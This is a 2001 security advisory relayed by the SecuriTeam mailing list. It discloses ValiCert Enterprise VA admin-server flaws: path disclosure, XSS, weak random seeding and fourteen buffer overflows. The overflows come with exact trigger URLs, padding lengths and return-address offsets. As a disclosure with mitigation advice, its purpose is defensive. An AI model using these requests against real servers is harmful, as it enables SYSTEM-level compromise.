[NEWS] Multiple ValiCert Security Problems

From: support@securiteam.com
Date: 12/08/01


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  8 Dec 2001 13:46:34 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Multiple ValiCert Security Problems
------------------------------------------------------------------------

SUMMARY

ValiCert Enterprise VA provides validity status responses for X.509
certificates and supports the following verification mechanisms:
 - Certificate Revocation Lists
 - CRL Distribution Points
 - Online Certificate Status Protocol

The Enterprise VA product architecture consists of:
 * Enterprise VA Administration Server for performing management
activities
 * Enterprise VA Host Server for processing validation requests VA API
defining custom extensions to Enterprise VA.

Numerous vulnerabilities have been located in a CGI script used by the
Enterprise VA Administration Server ranging from information gathering to
system compromise.

DETAILS

Vulnerable systems:
ValiCert Enterprise VA v3.3 - 4.2.1

Issue #1 - Path disclosure
A path disclosure issue exists in the forms.exe CGI script used by
ValiCert when a new extension is added. ValiCert can be extended by
adding new extensions that are processed by custom policies. The following
URL adds the extension, ldp:
http://computer:13333/cgi-bin/forms.exe?extension=ldp&command=Add+Extension

When an invalid extension, such as foobar, is provided in the following
URL:
http://computer:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension

The server returns an error page with the following text:
Following Input/Configuration file is NOT FOUND in the required location.

FILENAME = foobar
LOCATION = D:\Program Files\ValiCert\EnterpriseVA\entserv

Make sure the file is present in the above location and try again.

Revealing the path to the ValiCert installation.

Issue #2 - Cross-site scripting problem
Due to the lack of input validation and filtering, a cross-site scripting
issue exists in the certificate creation of the ValiCert Administrative
interface. A user creating a certificate can insert HTML code into the
descriptive fields. If the certificate is viewed through the ValiCert
Administrative server, the HTML is interpreted and any scripting is
executed. As an example, HTML code can be inserted into the organizational
name that is interpreted upon certificate display. In doing so, an
attacker can display a dialog box prompting the operator to enter a
password. Though it is not possible to access unauthorized resources, it
could be used to socially engineer an individual administering the
ValiCert server into entering sensitive data.

If the Administrative server is protected with a password, only those
individuals with the proper username/password can create such a
certificate containing malicious data in the fields.

Issue #3 - Random key generation
ValiCert generates 'random' tokens for communication with Hardware
Security Modules (securely stores digital certificates) using the C rand()
function call. Furthermore, the C rand() function is seeded using local
system time. Aside from the fact that the value is in itself predictable,
system clock ticks are generally not finite enough to be used as a good,
sole source of entropy. Seeding using local system time will guarantee
that the values outputted will linearly increase.

Finally, if the '/dev/urandom' device exists, ValiCert will use it by
default for certificate generation. Although for most purposes the
'/dev/urandom' device is sufficiently safe, it does not perform blocking
when its entropy pool is low. Taking into consideration that within a PKI,
non-repudiation (in the business, not the mathematical sense) is
paramount, the behavior of the '/dev/random' device is much more
favorable.

Issue #4 - Multiple buffer overflows
Multiple buffer overflows exist in the CGI script, forms.exe, which is
used by the ValiCert Enterprise VA Administration Server for management
activities. By default, the Administration Server listens on TCP port
13333 and can be configured to require a username and password for access.
Using the Apache v1.3.6 web server for Win32, the Administration Server
allows an operator to use a Web browser to:
  configure the Enterprise VA Host server
  start/stop the Enterprise VA Host server
  request product keys and licenses
  create key pairs
  add certificates
  add or modify certificate stores
  add and configure extensions
  view logs

In total, fourteen (14) independent and exploitable overflows in
parameters to forms.exe have been identified which allow code to be
executed with SYSTEM privileges. If the Administrative Server has been
configured to require a username and password for access, the attacker
requires the correct username and password to launch these attacks.

Mode overflow:
The following URL is used to switch to server configuration mode,
http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config

Providing a mode string of 265 bytes overflows a buffer during a copy
located at 0x0040acf8 in forms.exe and overwrites the return address that
is popped off the stack at the subroutine return located at 0x0040adf9.

http://localhost:13333/cgi-bin/forms.exe?forms.exe?command=change_index_mode&mode={A x 265}

Analysis of the code and stack contents reveals that the unchecked buffer
is 256 bytes long, followed by two pointers or 32-bit integers on the
stack and then the return address.

Certificate_File overflow:
The following URL is used to create a Microsoft-type certificate.

Providing a Certificate_Files parameter of 1028 bytes overflows a buffer
during a copy located at 0x0040599a in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x00405cb8.

http://localhost:13333/cgi-bin/forms.exe?CertServerSelection
=Microsoft&Certificate_Type=SHARE&Certificate_Files
={A x 1028}&command=Submit+Certificate+Type

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1024 bytes long, immediately followed by the return address on the
stack.

useExpiredCRLs overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the useExpiredCRLs parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b9dc in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs={A x 1288}&maxOCSPValidityPeriod
=0&command=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

listenLength overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the listenLength parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b54e in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength={A x 1288}&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxThread overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxThread parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b5f3 in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread={A x 1288}&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxConnPerSite overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxConnPerSite parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b67f in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite={A x 1288}&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxMsgLen overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxMsgLen parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b70b in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

exitTime overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the exitTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b797 in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime={A x 1288}&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

blockTime overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the blockTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b823 in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime={A x 1288}&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

nextUpdatePeriod overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the blockTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b8af in forms.exe and overwrites the return
address that is popped off the stack at the subroutine return located at
0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod={A x 1288}&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

buildLocal overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the buildLocal parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b950 in forms.exe and overwrites the
return address that is popped off the stack at the subroutine return
located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal={A x 1288}&useSoftwareSigning
=Software&sslSigningType=Software&sslServerHost=&sslCertFile
=sslCert.cert&sslPrivateKey=ssl.privkey&useExpiredCRLs
=0&maxOCSPValidityPeriod=0&command=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

maxOCSPValidityPeriod overflow:
The following URL is used to reconfigure the ValiCert server that responds
to validation requests.

Providing the maxOCSPValidityPeriod parameter a value of 1288 bytes
overflows a buffer during a copy located at 0x0040ba68 in forms.exe and
overwrites the return address that is popped off the stack at the
subroutine return located at 0x0040bb17.

http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod={A x 1288}&command
=Submit+Configuration+Parameters

(URL is line wrapped)

Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.

extension overflows:
ValiCert can be extended by adding new extensions that are processed by
custom policies. Attempting to add an extension with a file name of 995
bytes in length overflows a buffer at a sprintf located at 0x00417A9B in
forms.exe while the error message to be displayed to the client is
constructed. The long string overwrites the return address that is popped
off the stack at the subroutine return located at 0x00417AD0.

http://localhost:13333/cgi-bin/forms.exe?extension={A x
995}&command=Add+Extension

Analysis of the code and stack contents reveals that the subroutine
starting at 0x0040FEC0 makes many unchecked copies while converting the
extension parameter to an absolute filename (i.e. D:\Program
Files\ValiCert\EnterpriseVA\entserv\AAA..) and checking for existence,
etc. During the course of these copies, terminating null's in (assumed)
fixed-length buffers containing the filename are overwritten. As a result,
the absolute filename passed to the offending sprintf call is much longer
than expected. A solution to the sprintf problem will still leave the
overflows in 0x0040FEC0, which may possible be exploited.

Private key generation overflow:
The operator can use the Administrative Server to generate new private
keys for SSL communications or use in signing OCSP responses. An overflow
exists in the processing of requests for the generation of private keys.
The following is one example of how this overflow can be triggered by
requesting a new private key for SSL communications. Long strings in all
other parameter values other than the:
  country_name
  gen_self_signed_cert
  command
  keytype

Parameters will also trigger the overflow and overwrite a return address
on the stack. The following URL overwrites the return address with the
opt_company_name value (xxxx).

http://localhost:13333/cgi-bin/forms.exe?country_name=XX&state_name
=XX&locality_name=XX&org_name=XX&org_unit_name=X&common_name=X&email_address
=X@X&challenge_password={A x
833}&opt_company_name=xxxx&gen_self_signed_cert
=1&command=Submit+SW+Certificate+Request&keytype=BASIC%3BKEY_1

(URL is line wrapped)

Analysis of the code and stack contents reveals that the parameters:
  country_name
  state_name
  locality_name
  org_name
  org_unit_name
  common_name
  email_address
  challenge_password
  opt_company_name

Are parsed and then reformatted using a sprintf statement called at
0x402C2E8. The destination buffer is too small to contain the results and
overflows, overwriting the return address with the value in the
opt_company_name parameter. The corrupted return address is popped off the
stack at 0x0040C58A. The following set of constraints must be met for the
overflow to occur:

  a) The country_name parameter must be exactly two bytes long otherwise,
the offending sprintf call is never reached.
  b) The email_address parameter must be of the form string@string
otherwise the offending sprintf call is never reached.
  c) The total length of all parameters must be 864 bytes for the result
from sprintf to overwrite the return address. Longer lengths will cause
the buffer overflow but will also overwrite parameters passed to the
subroutine, causing the CGI script to crash before the subroutine
terminates and pops off the corrupted return address.

Vendor response:
ValiCert provided NMRC with their own advisory listing mitigation and fix
information but also informed NMRC that their advisory contains ValiCert
Inc. confidential and proprietary information. Based on this it is
unclear what information can be provided as a vendor response and all
customers of ValiCert are urged to contact support@valicert.com for more
information.

NMRC suggested solution:
NMRC offers the following suggestions to prevent these vulnerabilities
from being exploited:

If remote web administration is required, do so over an SSL connection to
prevent the admin user id and password from being captured. Otherwise,
blocking TCP port 13333, which is used for remote admin would prevent the
overflows from being successful.

ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@nmrc.org>
Information Anarchy 2K01.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.